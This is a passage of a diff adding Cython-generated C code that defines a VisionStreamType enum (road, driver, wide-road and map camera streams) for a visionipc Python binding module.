__PYX_ERR(1, 76, __pyx_L1_error) + __Pyx_XGOTREF(__Pyx_globals); + __Pyx_DECREF_SET(__Pyx_globals, ((PyObject*)__pyx_t_4)); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":77 + * + * cdef dict __Pyx_globals = globals() + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumType":81 + * + * VisionStreamType = __Pyx_FlagBase('VisionStreamType', [ + * ('VISION_STREAM_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD)), # <<<<<<<<<<<<<< + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), + * ('VISION_STREAM_WIDE_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD)), + */ + __pyx_t_4 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_ROAD); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 81, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 81, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_ROAD); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_ROAD); + PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_n_s_VISION_STREAM_ROAD); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":82 + * VisionStreamType = __Pyx_FlagBase('VisionStreamType', [ + * ('VISION_STREAM_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD)), + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), # <<<<<<<<<<<<<< + * ('VISION_STREAM_WIDE_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD)), + * ('VISION_STREAM_MAP', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP)), + */ + __pyx_t_4 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_DRIVER); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_DRIVER); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_DRIVER); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_VISION_STREAM_DRIVER); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":83 + * ('VISION_STREAM_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD)), + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), + * ('VISION_STREAM_WIDE_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD)), # <<<<<<<<<<<<<< + * ('VISION_STREAM_MAP', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP)), + * + */ + __pyx_t_4 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_WIDE_ROAD); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_WIDE_ROAD); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_WIDE_ROAD); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_n_s_VISION_STREAM_WIDE_ROAD); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":84 + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), + * ('VISION_STREAM_WIDE_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD)), + * ('VISION_STREAM_MAP', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP)), # <<<<<<<<<<<<<< + * + * ], module=__Pyx_globals.get("__module__", 'cereal.visionipc.visionipc_pyx')) + */ + __pyx_t_4 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_MAP); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 84, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 84, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_MAP); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_MAP); + PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_n_s_VISION_STREAM_MAP); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":80 + * + * + * VisionStreamType = __Pyx_FlagBase('VisionStreamType', [ # <<<<<<<<<<<<<< + * ('VISION_STREAM_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD)), + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), + */ + __pyx_t_4 = PyList_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_4, 0, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_4, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_4, 2, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_10); + PyList_SET_ITEM(__pyx_t_4, 3, __pyx_t_10); + __pyx_t_6 = 0; + __pyx_t_3 = 0; + __pyx_t_5 = 0; + __pyx_t_10 = 0; + __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_INCREF(__pyx_n_s_VisionStreamType); + __Pyx_GIVEREF(__pyx_n_s_VisionStreamType); + PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_n_s_VisionStreamType); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumType":86 + * ('VISION_STREAM_MAP', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP)), + * + * ], module=__Pyx_globals.get("__module__", 'cereal.visionipc.visionipc_pyx')) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x030B0000: + */ + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "get"); + __PYX_ERR(1, 86, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_PyDict_GetItemDefault(__Pyx_globals, __pyx_n_s_module, __pyx_kp_s_cereal_visionipc_visionipc_pyx); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_module_2, __pyx_t_5) < 0) __PYX_ERR(1, 86, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":80 + * + * + * VisionStreamType = __Pyx_FlagBase('VisionStreamType', [ # <<<<<<<<<<<<<< + * ('VISION_STREAM_ROAD', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD)), + * ('VISION_STREAM_DRIVER', __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER)), + */ + __pyx_t_5 = __Pyx_PyObject_Call(__Pyx_FlagBase, __pyx_t_10, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_d, __pyx_n_s_VisionStreamType, __pyx_t_5) < 0) __PYX_ERR(1, 80, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":88 + * ], module=__Pyx_globals.get("__module__", 'cereal.visionipc.visionipc_pyx')) + * + * if PY_VERSION_HEX >= 0x030B0000: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x030B0000); + if (__pyx_t_2) { + + /* "EnumType":93 + * + * + * VisionStreamType._member_names_ = list(VisionStreamType.__members__) # <<<<<<<<<<<<<< + * + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType.VISION_STREAM_ROAD + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_members); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PySequence_ListKeepNew(__pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__Pyx_PyObject_SetAttrStr(__pyx_t_4, __pyx_n_s_member_names, __pyx_t_5) < 0) __PYX_ERR(1, 93, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumType":88 + * ], module=__Pyx_globals.get("__module__", 'cereal.visionipc.visionipc_pyx')) + * + * if PY_VERSION_HEX >= 0x030B0000: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "EnumType":95 + * VisionStreamType._member_names_ = list(VisionStreamType.__members__) + * + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType.VISION_STREAM_ROAD # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType.VISION_STREAM_DRIVER + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType.VISION_STREAM_WIDE_ROAD + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_VISION_STREAM_ROAD); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 95, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_ROAD, __pyx_t_5) < 0))) __PYX_ERR(1, 95, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":96 + * + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType.VISION_STREAM_ROAD + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType.VISION_STREAM_DRIVER # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType.VISION_STREAM_WIDE_ROAD + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType.VISION_STREAM_MAP + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_VISION_STREAM_DRIVER); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 96, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_DRIVER, __pyx_t_4) < 0))) __PYX_ERR(1, 96, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumType":97 + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType.VISION_STREAM_ROAD + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType.VISION_STREAM_DRIVER + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType.VISION_STREAM_WIDE_ROAD # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType.VISION_STREAM_MAP + * else: + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_VISION_STREAM_WIDE_ROAD); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 97, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_WIDE_ROAD, __pyx_t_5) < 0))) __PYX_ERR(1, 97, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":98 + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType.VISION_STREAM_DRIVER + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType.VISION_STREAM_WIDE_ROAD + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType.VISION_STREAM_MAP # <<<<<<<<<<<<<< + * else: + * class VisionStreamType(__Pyx_FlagBase): + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_VISION_STREAM_MAP); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 98, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_MAP, __pyx_t_4) < 0))) __PYX_ERR(1, 98, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumType":77 + * + * cdef dict __Pyx_globals = globals() + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * + * + */ + goto __pyx_L33; + } + + /* "EnumType":100 + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType.VISION_STREAM_MAP + * else: + * class VisionStreamType(__Pyx_FlagBase): # <<<<<<<<<<<<<< + * pass + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD), 'VISION_STREAM_ROAD') + */ + /*else*/ { + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__Pyx_FlagBase); + __Pyx_GIVEREF(__Pyx_FlagBase); + PyTuple_SET_ITEM(__pyx_t_4, 0, __Pyx_FlagBase); + __pyx_t_5 = __Pyx_PEP560_update_bases(__pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_10 = __Pyx_CalculateMetaclass(NULL, __pyx_t_5); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_3 = __Pyx_Py3MetaclassPrepare(__pyx_t_10, __pyx_t_5, __pyx_n_s_VisionStreamType, __pyx_n_s_VisionStreamType, (PyObject *) NULL, __pyx_n_s_EnumType, (PyObject *) NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (__pyx_t_5 != __pyx_t_4) { + if (unlikely((PyDict_SetItemString(__pyx_t_3, "__orig_bases__", __pyx_t_4) < 0))) __PYX_ERR(1, 100, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_Py3ClassCreate(__pyx_t_10, __pyx_n_s_VisionStreamType, __pyx_t_5, __pyx_t_3, NULL, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_VisionStreamType, __pyx_t_4) < 0) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":102 + * class VisionStreamType(__Pyx_FlagBase): + * pass + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD), 'VISION_STREAM_ROAD') # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER), 'VISION_STREAM_DRIVER') + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD), 'VISION_STREAM_WIDE_ROAD') + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_10 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_ROAD); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_10); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_10); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_ROAD); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_ROAD); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_n_s_VISION_STREAM_ROAD); + __pyx_t_10 = 0; + __pyx_t_10 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_3, NULL); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 102, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_ROAD, __pyx_t_10) < 0))) __PYX_ERR(1, 102, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "EnumType":103 + * pass + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD), 'VISION_STREAM_ROAD') + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER), 'VISION_STREAM_DRIVER') # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD), 'VISION_STREAM_WIDE_ROAD') + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP), 'VISION_STREAM_MAP') + */ + __Pyx_GetModuleGlobalName(__pyx_t_10, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_3 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_DRIVER); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_3); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_DRIVER); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_DRIVER); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_n_s_VISION_STREAM_DRIVER); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_10, __pyx_t_5, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 103, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_DRIVER, __pyx_t_3) < 0))) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "EnumType":104 + * __Pyx_globals['VISION_STREAM_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_ROAD), 'VISION_STREAM_ROAD') + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER), 'VISION_STREAM_DRIVER') + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD), 'VISION_STREAM_WIDE_ROAD') # <<<<<<<<<<<<<< + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP), 'VISION_STREAM_MAP') + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_WIDE_ROAD); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_t_5); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_WIDE_ROAD); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_WIDE_ROAD); + PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_n_s_VISION_STREAM_WIDE_ROAD); + __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_10, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 104, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_WIDE_ROAD, __pyx_t_5) < 0))) __PYX_ERR(1, 